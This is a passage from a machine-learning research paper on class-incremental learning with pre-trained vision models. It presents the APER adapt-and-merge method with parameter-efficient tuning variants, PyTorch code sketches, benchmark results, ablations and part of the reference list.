Since $D^1$ is a subset of the incremental data stream, it also possesses domain-specific knowledge that can facilitate model adaptation. The tuning process enhances the adaptivity of the CIL model, and the next question is how to ensure generalizability. Since Eq. (5) forces the originally generalizable features to become more specialized to the downstream task, high-level features irrelevant to $D^1$ shall be overwritten and forgotten. Therefore, a better solution is to concatenate the features extracted by the PTM and the adapted model, i.e., $[\phi^*(x), \phi(x)]$, where $\phi^*(x)$ and $\phi(x)$ stand for the adapted and pre-trained embedding functions, respectively. To maintain generalizability, we freeze the concatenated embedding function $[\phi^*(\cdot), \phi(\cdot)]$ after adaptation and extract prototypes for the following classes:

$$p_i = \frac{1}{K} \sum_{j=1}^{|D^b|} \mathbb{I}(y_j = i)\,[\phi^*(x_j), \phi(x_j)], \tag{6}$$

where $K = \sum_{j=1}^{|D^b|} \mathbb{I}(y_j = i)$. Compared to Eq. (3), Eq. (6) contains additional information from the adapted model, which incorporates domain-specific features for better recognition. These prototypes reveal the most common patterns from the adapted and pre-trained models, ensuring both generalizability and adaptivity. We directly adopt the class prototype as the classifier weight, i.e., $w_i = p_i$, and utilize a cosine classifier for classification: $f(x) = (\frac{W}{\|W\|_2})^\top (\frac{[\phi^*(x), \phi(x)]}{\|[\phi^*(x), \phi(x)]\|_2})$. Based on the similarity between the instance embedding and the class prototypes, it assigns a higher probability to the class with a more similar prototype.

**Effect of Adapt and Merge:** We illustrate APER in Figure 3 (left). Although $D^1$ is a subset of the entire training set, adapting with it still helps transfer the PTM from the upstream dataset to the downstream task. The adapting process can be viewed as a further pre-training procedure, which adapts the PTM to the incremental dataset and bridges the domain gap. By merging the embedding functions of the PTM and the adapted model, the extracted features are more representative than either of them alone. Additionally, since the model is only trainable in the first incremental task, the efficiency of APER is comparable to SimpleCIL, which does not require sequential tuning. On the other hand, since the model is frozen in the subsequent tasks, it does not suffer catastrophic forgetting of former concepts. We give the pseudo-code of APER in Algorithm 1. In the extreme case where the adaptation process in Eq. (5) does nothing to the PTM, APER degrades to SimpleCIL, which guarantees the performance lower bound.
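Extending the SimpleCIL sketch above, the following is a minimal sketch of the merge step in Eq. (6) and the cosine classifier, assuming `phi_ad` and `phi_pt` are the (frozen) adapted and pre-trained embedding functions; all names are illustrative rather than from the paper's code.

```python
import torch
import torch.nn.functional as F

@torch.no_grad()
def build_aper_prototypes(phi_ad, phi_pt, loader, num_classes, feat_dim):
    """Eq. (6): class means over the concatenated embeddings [phi*(x), phi(x)]."""
    protos = torch.zeros(num_classes, 2 * feat_dim)    # 2d-dimensional prototypes
    counts = torch.zeros(num_classes)
    for x, y in loader:
        z = torch.cat([phi_ad(x), phi_pt(x)], dim=-1)  # adapted || pre-trained
        protos.index_add_(0, y, z)
        counts.index_add_(0, y, torch.ones_like(y, dtype=torch.float))
    return protos / counts.clamp(min=1).unsqueeze(1)

@torch.no_grad()
def aper_logits(phi_ad, phi_pt, x, prototypes):
    """Cosine classifier: normalized prototypes vs. normalized query embedding."""
    z = torch.cat([phi_ad(x), phi_pt(x)], dim=-1)
    return F.normalize(z, dim=-1) @ F.normalize(prototypes, dim=-1).T
```

Because no gradient update happens after the first stage, each new task only appends rows to `prototypes`, which is why APER avoids forgetting earlier concepts.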
4.2 ADAPTING THE PTM

To bridge the distribution gap between the pre-trained and incremental datasets, APER's performance depends on an effective adapting algorithm $\mathcal{F}$. In this section, we discuss six specializations of $\mathcal{F}$ in APER that can handle different types of PTMs, such as ViTs and CNNs.

**Fully Finetune**: is a naive idea when transferring the model to downstream tasks. It involves tuning all parameters in the adapting process, i.e., $\Theta = \theta_\phi \cup \theta_W$, and minimizing the discrepancy between the model's output and the ground truth:

$$\min_{\theta_\phi \cup \theta_W} \sum_{(x_j, y_j) \in D^1} \ell(f(x_j), y_j). \tag{7}$$

However, the tuning cost can be relatively high for large-scale PTMs, e.g., ViTs. Therefore, parameter-efficient tuning techniques that alleviate the tuning cost can be better solutions.

**Visual Prompt Tuning (VPT)** (Jia et al., 2022): is a lightweight tuning technique for adapting ViTs, which prepends learnable prompts $P \in \mathbb{R}^{p \times d}$ to form the extended features $[P, x_e]$, where $x_e$ is the encoded features of the input image. The extended features are then fed into the subsequent layers of the ViT to calculate the final embeddings. There are two variations of VPT: **VPT-Deep**, which prepends the prompts at every attention layer, and **VPT-Shallow**, which only prepends the prompts at the first layer. During optimization, it freezes the pre-trained weights in the embedding function and optimizes only the prompts and classification head, i.e., $\Theta = \theta_P \cup \theta_W$.

**Scale & Shift (SSF)** (Lian et al., 2022): aims to adjust the feature activations by scaling and shifting. It appends an extra SSF layer after each operation layer (i.e., MSA and MLP) and adjusts the output of these operations. Given the input $x_i \in \mathbb{R}^{L \times d}$, the output $x_o \in \mathbb{R}^{L \times d}$ is formulated as:

$$x_o = \gamma \otimes x_i + \beta, \tag{8}$$

where $\gamma \in \mathbb{R}^d$ and $\beta \in \mathbb{R}^d$ are the scale and shift factors, respectively, and $\otimes$ is the Hadamard product (element-wise multiplication). The model optimizes the SSF layers and the classifier, i.e., $\Theta = \theta_{SSF} \cup \theta_W$, to capture the features of new tasks.

**Adapter** (Houlsby et al., 2019; Chen et al., 2022a): is a bottleneck module which contains a down-projection $W_{down} \in \mathbb{R}^{d \times r}$ to reduce the feature dimension, a non-linear activation function, and an up-projection $W_{up} \in \mathbb{R}^{r \times d}$ to project back to the original dimension. We follow (Chen et al., 2022a) to equip the original MLP structure in ViT with the adapter. Denoting the input of the MLP layer as $x_e$, the output of AdaptMLP is formulated as:

$$\text{MLP}(x_e) + \text{ReLU}(x_e W_{down}) W_{up}. \tag{9}$$

With the pre-trained weights frozen, it optimizes the adapter and classification head, i.e., $\Theta = \theta_{W_{down}} \cup \theta_{W_{up}} \cup \theta_W$.

**Batch Normalization Tuning**: If the PTM is a convolutional network, e.g., a CNN, we can adjust the BN (Ioffe & Szegedy, 2015) parameters. Since the running mean and variance in BN are matched to the upstream data distribution, they can be unstable for downstream tasks. Correspondingly, we can reset the running statistics in BN and adapt to the current data via forward passes. No backpropagation is required, making it quick and simple for the pre-trained model.
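As an illustration of two of these specializations, here is a short PyTorch sketch of the AdaptMLP block from Eq. (9) and of BN statistics tuning. The class and function names are ours, and the zero-initialized up-projection is a common adapter convention we assume rather than a detail stated above.

```python
import torch
import torch.nn as nn

class AdaptMLP(nn.Module):
    """Frozen pre-trained MLP plus a parallel bottleneck adapter, as in Eq. (9)."""
    def __init__(self, mlp: nn.Module, d: int, r: int = 16):
        super().__init__()
        self.mlp = mlp                            # pre-trained MLP, kept frozen
        for p in self.mlp.parameters():
            p.requires_grad = False
        self.down = nn.Linear(d, r, bias=False)   # W_down: d -> r
        self.up = nn.Linear(r, d, bias=False)     # W_up:   r -> d
        nn.init.zeros_(self.up.weight)            # start as an identity-like residual

    def forward(self, x):                         # x: (L, d) token features
        return self.mlp(x) + self.up(torch.relu(self.down(x)))

@torch.no_grad()
def tune_bn_statistics(model: nn.Module, loader):
    """BN tuning: reset running stats, then re-estimate them via forward passes only."""
    for m in model.modules():
        if isinstance(m, nn.BatchNorm2d):
            m.reset_running_stats()
    model.train()                                 # BN updates stats in train mode
    for x, _ in loader:
        model(x)                                  # no backpropagation needed
    model.eval()
```

Note that only `self.down` and `self.up` (plus the classification head) receive gradients, matching $\Theta = \theta_{W_{down}} \cup \theta_{W_{up}} \cup \theta_W$, while BN tuning updates no weights at all.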
**Discussions**: We visualize the adapting process of APER in Figure 3. Compared to fully finetuning, parameter-efficient tuning adjusts the PTM towards the downstream task while preserving its generalizability. The adapted model can capture the specialized features in the incremental data, leading to better adaptivity. Since L2P and DualPrompt are based on a pre-trained ViT, they cannot be deployed with CNNs. In contrast, APER is a general framework that efficiently handles diverse structures. Specifically, APER can be combined with VPT/SSF/Adapter for ViTs and SSF/BN Tuning for CNNs. Since APER adopts the prototype-based classifier, the linear classifier $W$ is dropped after adaptation.

5 EXPERIMENTS

This section compares APER with SOTA methods on benchmark datasets to show its superiority. Due to the overlap between pre-training datasets and traditional CIL benchmarks, we also advocate four new benchmarks for evaluating PTM-based methods. Ablations and visualizations verify the effectiveness of APER on new classes. We also explore the performance of different PTMs in CIL. More details and extra results are included in Section C.

Table 1: Average ($\bar{A}$) and last-stage ($A_B$) accuracy comparison with ViT-B/16-IN21K as the backbone. 'IN-R/A' stands for 'ImageNet-R/A.' We report more results in Section D. The best performance is shown in bold.

| Method | CIFAR B0 Inc5 $\bar{A}$ | CIFAR $A_B$ | CUB B0 Inc10 $\bar{A}$ | CUB $A_B$ | IN-R B0 Inc5 $\bar{A}$ | IN-R $A_B$ | IN-A B0 Inc10 $\bar{A}$ |
|---|---|---|---|---|---|---|---|
| Finetune | 38.90 | 20.17 | 26.08 | 13.96 | 21.61 | 10.79 | 21.60 |
| Finetune Adapter | 60.51 | 49.32 | 66.84 | 52.99 | 47.59 | 40.28 | 43.05 |
| LwF | 46.29 | 41.44 | 59.03 | 48.07 | 39.17 | 26.47 | 35.93 |
| SDC | 68.51 | 63.05 | 60.62 | 66.33 | 52.17 | 46.65 | 33.52 |
| L2P | 85.94 | 79.93 | 67.05 | 66.25 | 59.22 | 47.16 | 38.48 |
| DualPrompt | 87.87 | 81.15 | 77.47 | 66.54 | 63.31 | 55.22 | 52.56 |
| CODA-Prompt | 89.11 | 81.96 | 84.00 | 73.37 | 64.42 | 55.08 | 48.51 |
| SimpleCIL | 87.57 | 81.26 | 92.20 | **86.73** | 62.58 | 54.55 | 60.50 |
| APER w/ Finetune | 87.67 | 81.57 | 91.82 | 86.56 | 70.11 | 62.28 | 61.57 |
| APER w/ VPT-Shallow | 84.57 | 81.32 | 90.51 | 86.66 | 66.32 | 57.32 | 54.15 |
| APER w/ VPT-Deep | 88.46 | 82.17 | 91.02 | 84.99 | 68.79 | 60.48 | 50.59 |
| APER w/ SSF | 87.78 | 81.98 | 91.72 | 86.13 | 68.94 | 60.60 | **62.81** |
| APER w/ Adapter | **90.65** | **85.15** | **92.21** | **86.73** | **72.35** | **64.33** | 60.53 |

5.1 IMPLEMENTATION DETAILS

**Dataset**: Following (Wang et al., 2022d; Yu et al., 2020), we evaluate the performance on CIFAR100 (Krizhevsky et al., 2009), CUB200 (Wah et al., 2011), and ImageNet-R (Hendrycks et al., 2021a). Since PTMs are often trained with ImageNet21K (Deng et al., 2009), evaluating PTM-based methods on ImageNet is meaningless. Hence, we advocate four new datasets that have a large domain gap with ImageNet, namely ImageNet-A (Hendrycks et al., 2021b), ObjectNet (Barbu et al., 2019), OmniBenchmark (Zhang et al., 2022), and VTAB (Zhai et al., 2019). Among them, ImageNet-A and ObjectNet contain challenging samples that ImageNet pre-trained models cannot handle, while OmniBenchmark and VTAB contain diverse classes from multiple complex realms. To construct the CIL tasks, we sample 200 classes from ObjectNet and ImageNet-A, and 300 from OmniBenchmark.
We sample 5 datasets from VTAB, each containing 10 classes, to construct the cross-domain CIL setting. Following (Rebuffi et al., 2017b), we shuffle the classes with the same random seed and split them into 'B/Base-m, Inc-n' settings, meaning the first task contains m classes and each following task contains n classes; m = 0 means the total classes are equally divided into each task (see the code sketch below).

**Comparison methods**: We first compare to the SOTA PTM-based CIL methods L2P (Wang et al., 2022c), DualPrompt (Wang et al., 2022d), and CODA-Prompt (Smith et al., 2023). We also modify the classical CIL methods LwF (Li & Hoiem, 2017), SDC (Yu et al., 2020), iCaRL (Rebuffi et al., 2017b), LUCIR (Hou et al., 2019), DER (Yan et al., 2021), FOSTER (Wang et al., 2022a), MEMO (Zhou et al., 2023b), and FACT (Zhou et al., 2022a) to utilize the same PTM as the initialization. Apart from SimpleCIL, we also report the baseline of sequentially tuning the model, denoted as Finetune.

**Training details**: We use PyTorch (Paszke et al., 2019) to deploy all models on Tesla V100 GPUs with the same network backbone. As there are various PTMs publicly available (Wightman, 2019), we follow (Wang et al., 2022e) to choose the most representative ones, denoted as ViT-B/16-IN1K and ViT-B/16-IN21K. Both are pre-trained on ImageNet21K, while the former is additionally finetuned on ImageNet1K. During adaptation, we train the model with a batch size of 48 for 20 epochs and use SGD with momentum for optimization. The learning rate starts from 0.01 and decays with cosine annealing. The prompt length p is 5 for VPT, and the projection dimension r is 16 for the Adapter. The source code will be publicly available upon acceptance.

**Evaluation metrics**: Denoting the accuracy after the b-th stage as $A_b$, we follow (Rebuffi et al., 2017b) to use $A_B$ (last-stage performance) and $\bar{A} = \frac{1}{B} \sum_{b=1}^{B} A_b$ (average performance) for evaluation.

5.2 BENCHMARK COMPARISON

We report the incremental performance against SOTA methods in Table 1, where all methods are based on the pre-trained ViT-B/16-IN21K. We also train these models with the pre-trained ViT-B/16-IN1K and show the incremental trend in Figure 4(a)–4(f). These data splits include settings with large and small base classes for a holistic evaluation. Firstly, we can infer that the embeddings of PTMs are generalizable and can be directly applied for CIL to beat the SOTA. Specifically, the baseline SimpleCIL outperforms DualPrompt by 20% on CUB and 8% on ImageNet-A in terms of $A_B$. However, strong PTMs can be further improved if they are adapted by APER, as downstream tasks have a large domain gap with the pre-trained dataset. Specifically, we find that APER consistently outperforms SimpleCIL on all seven benchmark datasets. In contrast, sequentially finetuning the model suffers severe forgetting, which verifies the effectiveness of the adapt-and-merge protocol. Since APER only requires tuning the PTM in the first stage, it requires less training time and fewer extra parameters than L2P and DualPrompt, as shown in Figure 1. Among the variations of adapting techniques, we find SSF and Adapter are more efficient than VPT.

Figure 4: (a)~(f): Incremental performance with ViT-B/16-IN1K as the backbone when half of the total classes are base classes. (g)~(h): Incremental performance when using ResNet18 as the backbone. Since L2P and DualPrompt cannot be deployed with ResNet, we do not report their performance. APER consistently improves the performance of different backbones, i.e., ViT and CNN. 'OBenchmark' stands for 'OmniBenchmark.'
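As a concrete reading of the 'B/Base-m, Inc-n' protocol and the two metrics, here is a small sketch; the seed value and function names are ours, chosen for illustration.

```python
import numpy as np

def split_classes(num_classes: int, base_m: int, inc_n: int, seed: int = 0):
    """'B/Base-m, Inc-n': shuffle the class order with a fixed seed, then split
    into a first task of m classes followed by tasks of n classes each.
    base_m == 0 divides all classes equally into tasks of size inc_n."""
    order = np.random.RandomState(seed).permutation(num_classes).tolist()
    first = base_m if base_m > 0 else inc_n
    tasks, start = [order[:first]], first
    while start < num_classes:
        tasks.append(order[start:start + inc_n])
        start += inc_n
    return tasks

def summarize(acc_per_stage):
    """Return (A_bar, A_B): the average over stages and the last-stage accuracy."""
    return sum(acc_per_stage) / len(acc_per_stage), acc_per_stage[-1]

# e.g., CIFAR100 'B0 Inc5' yields 20 tasks of 5 classes each
assert len(split_classes(100, 0, 5)) == 20
```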
We also compare to SOTA traditional CIL methods, modifying their backbones into the pre-trained ViT for a fair comparison. However, we can infer from Table 2 that these methods work poorly without exemplars. Apart from ViTs, APER also works well with pre-trained CNNs. We adopt a pre-trained ResNet18 (He et al., 2016) for evaluation and plot the incremental performance in Figure 4(g)~4(h). The results show that APER consistently boosts the performance of pre-trained ViTs and CNNs. See full results in Section D.

Lastly, as shown in Table 1, the performance on typical benchmarks is approaching saturation, as they have a small domain gap with ImageNet. By contrast, due to the large domain gap between our newly established benchmarks and ImageNet, there is still space for improvement, indicating the effectiveness and necessity of these new benchmarks. We also consider a more challenging TV-series incremental learning task in Section C.1.

5.3 ABLATION STUDY

**Downscale features**: Since APER aggregates the features of the PTM and the adapted model, its embedding dimension is twice that of a single PTM. We conduct an ablation with APER w/ SSF on CIFAR100 Base50 Inc5 to examine whether all of these features are essential for CIL. Specifically, we train a PCA (Pearson, 1901) model in the first stage to reduce the embedding dimension for the following stages. Denoting the target dimension as $k$, we train the PCA model $\text{PCA}: \mathbb{R}^{2d} \rightarrow \mathbb{R}^k$ on the concatenated features $[\phi^*(x), \phi(x)]$ and append it to the feature extractor (a code sketch follows at the end of this subsection). Hence, the features and prototypes are projected to $k$ dimensions. We plot the performance as $k$ changes in Figure 5(a). Specifically, APER obtains performance competitive with DualPrompt (with 768 dims) even when the features are projected to 50 dims. We also experiment by randomly sampling $k$ features from the original feature space and report the results in Figure 5(b). The conclusions are consistent with the former ones, showing that randomly sampling 200 dimensions of APER achieves the same performance scale as DualPrompt. The accuracy-dimension curves are shown in Figure 5(c).

**Sub-modules**: Since APER concatenates the PTM and the adapted model, we conduct ablations on ImageNet-A Base100 Inc5 with ViT-B/16-IN21K to compare APER w/ Finetune against its sub-modules. Specifically, we build SimpleCIL with $\phi(\cdot)$ and $\phi^*(\cdot)$, respectively, denoted as SimpleCIL-PTM and SimpleCIL-Adapted. The former represents the capability of the PTM, while the latter stands for the power of the adapted model. Both are compositional modules in APER. Besides, we build SimpleCIL based on the concatenated pre-trained ViT-B/16-IN21K and ViT-B/16-IN1K, denoted as SimpleCIL-21K+1K. It utilizes the aggregated features of two embedding functions, which has the same dimension as APER. As shown in Figure 5(d), SimpleCIL-Adapted outperforms SimpleCIL-PTM, indicating the importance of model adaptation. However, adapting the model also overwrites the high-level features, which reduces the model's generalizability. The adapted model suffers larger performance degradation than vanilla SimpleCIL, indicating the effect of generalizability in resisting forgetting. APER outperforms every sub-module with unified adaptivity and generalizability.
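Following up on the downscaling ablation above, here is a minimal sketch assuming scikit-learn's PCA and the prototype/query helpers sketched earlier; the helper name is ours.

```python
import numpy as np
from sklearn.decomposition import PCA

def fit_downscaler(first_stage_feats: np.ndarray, k: int) -> PCA:
    """Fit PCA on first-stage concatenated embeddings [phi*(x), phi(x)]
    (shape N x 2d) and reuse the frozen projection in every later stage."""
    return PCA(n_components=k).fit(first_stage_feats)

# Usage sketch: project prototypes and query embeddings before the cosine
# classifier so both live in the same k-dimensional space.
# pca = fit_downscaler(train_feats, k=50)
# protos_k = pca.transform(prototypes)        # (num_classes, k)
# query_k = pca.transform(query_embeddings)   # (batch, k)
```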
**Different PTMs**: Observing the performance gap between ViT-B/16-IN21K and ViT-B/16-IN1K, we seek to explore different kinds of PTMs, i.e., ResNet18/50/152 (He et al., 2016), ViT-B/16-IN1K/21K, ViT-L/16-IN1K, ViT-B/16-DINO (Caron et al., 2021), ViT-B/16-SAM (Chen et al., 2022b), ViT-B/16-MAE (He et al., 2022b), and ViT-B/16-CLIP (Radford et al., 2021) (image encoder) for a holistic evaluation, and we report the results in Figure 6. We can draw three main conclusions. 1) Pre-trained ViTs show better generalizability than ResNets. 2) Larger ViTs generalize better than smaller ones, and ViTs trained with a supervised loss perform better than unsupervised ones. 3) Owing to the massive training corpus and the contrastive loss, CLIP performs better than ImageNet21K pre-trained ViTs. Finally, we find that APER w/ Finetune consistently improves the performance of SimpleCIL for any PTM, thus validating its effectiveness.

**Visualizations**: We visualize the learned decision boundaries with t-SNE (Van der Maaten & Hinton, 2008) on the CIFAR100 dataset between two incremental stages, as shown in Figure 7(a)/(b). We visualize the classes from the first and second incremental tasks with colorful dots and triangles, respectively, and the class prototypes are represented by squares. As we can infer from these figures, the PTM works competitively, separating the instances well into their corresponding classes. The class prototypes are situated at the center of each class, verifying their representativeness for recognition. When extending the model from the first to the second stage, we find APER performs well on both old and new classes. More visualizations are shown in Section C.4.

6 CONCLUSION

Learning with incremental classes is of great importance in real-world applications, which requires adaptivity for updating and generalizability for knowledge transfer. In this paper, we systematically revisit CIL with PTMs and draw three conclusions. Firstly, a frozen PTM can provide generalizable embeddings for CIL, enabling a prototype-based classifier to outperform the current state-of-the-art. Secondly, due to the distribution gap between pre-trained and downstream datasets, PTMs can be further harnessed to enhance their adaptivity. To this end, we propose APER, which can be orthogonally combined with any parameter-efficient tuning method to unify generalizability and adaptivity for CIL. Lastly, due to data overlapping, traditional ImageNet-based benchmarks are unsuitable for evaluation in the era of PTMs. Hence, we propose four new benchmarks to evaluate PTM-based CIL methods. Extensive experiments verify APER's state-of-the-art performance. Future work includes exploring task-specific tuning methods and structures.

**Limitations** include the restriction to the exemplar-free setting. The problem turns into exemplar-based CIL if sufficient old-class instances are available, where adaptivity can be further addressed through data rehearsal.

REFERENCES

Amit Alfassy, Assaf Arbelle, Oshri Halimi, Sivan Harary, Roei Herzig, Eli Schwartz, Rameswar Panda, Michele Dolfi, Christoph Auer, Kate Saenko, et al. Feta: Towards specializing foundation models for expert task applications. *arXiv preprint arXiv:2209.03648*, 2022.

Rahaf Aljundi, Min Lin, Baptiste Goujaud, and Yoshua Bengio. Gradient based sample selection for online continual learning. In *NeurIPS*, pp. 11816–11825, 2019.

Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016.
Hyojin Bahng, Ali Jahanian, Swami Sankaranarayanan, and Phillip Isola. Visual prompting: Modifying pixel space to adapt pre-trained models. *arXiv preprint arXiv:2203.17274*, 2022.

Andrei Barbu, David Mayo, Julian Alverio, William Luo, Christopher Wang, Dan Gutfreund, Josh Tenenbaum, and Boris Katz. Objectnet: A large-scale bias-controlled dataset for pushing the limits of object recognition models. *NeurIPS*, 32, 2019.

Eden Belouadah and Adrian Popescu. Il2m: Class incremental learning with dual memory. In *ICCV*, pp. 583–592, 2019.

Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *ICCV*, pp. 9650–9660, 2021.

Arslan Chaudhry, Puneet K Dokania, Thalaiyasingam Ajanthan, and Philip HS Torr. Riemannian walk for incremental learning: Understanding forgetting and intransigence. In *ECCV*, pp. 532–547, 2018.

Shoufa Chen, GE Chongjian, Zhan Tong, Jiangliu Wang, Yibing Song, Jue Wang, and Ping Luo. Adaptformer: Adapting vision transformers for scalable visual recognition. In *NeurIPS*, 2022a.

Xiangning Chen, Cho-Jui Hsieh, and Boqing Gong. When vision transformers outperform resnets without pre-training or strong data augmentations. In *ICLR*, 2022b.

Gong Cheng, Junwei Han, and Xiaoqiang Lu. Remote sensing image scene classification: Benchmark and state of the art. *Proceedings of the IEEE*, 105(10):1865–1883, 2017.

M. Cimpoi, S. Maji, I. Kokkinos, S. Mohamed, and A. Vedaldi. Describing textures in the wild. In *CVPR*, 2014.

Matthias De Lange, Rahaf Aljundi, Marc Masana, Sarah Parisot, Xu Jia, Aleš Leonardis, Gregory Slabaugh, and Tinne Tuytelaars. A continual learning survey: Defying forgetting in classification tasks. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, 44(7):3366–3385, 2021.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *CVPR*, pp. 248–255, 2009.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *ICLR*, 2020.

Arthur Douillard, Matthieu Cord, Charles Ollion, Thomas Robert, and Eduardo Valle. Podnet: Pooled outputs distillation for small-tasks incremental learning. In *ECCV*, pp. 86–102, 2020.

Arthur Douillard, Alexandre Ramé, Guillaume Couairon, and Matthieu Cord. Dytox: Transformers for continual learning with dynamic token expansion. In *CVPR*, pp. 9285–9295, 2022.

Robert M French. Catastrophic forgetting in connectionist networks. *Trends in Cognitive Sciences*, 3(4):128–135, 1999.

Heitor Murilo Gomes, Jean Paul Barddal, Fabrício Enembreck, and Albert Bifet. A survey on ensemble learning for data stream classification. *CSUR*, 50(2):1–36, 2017.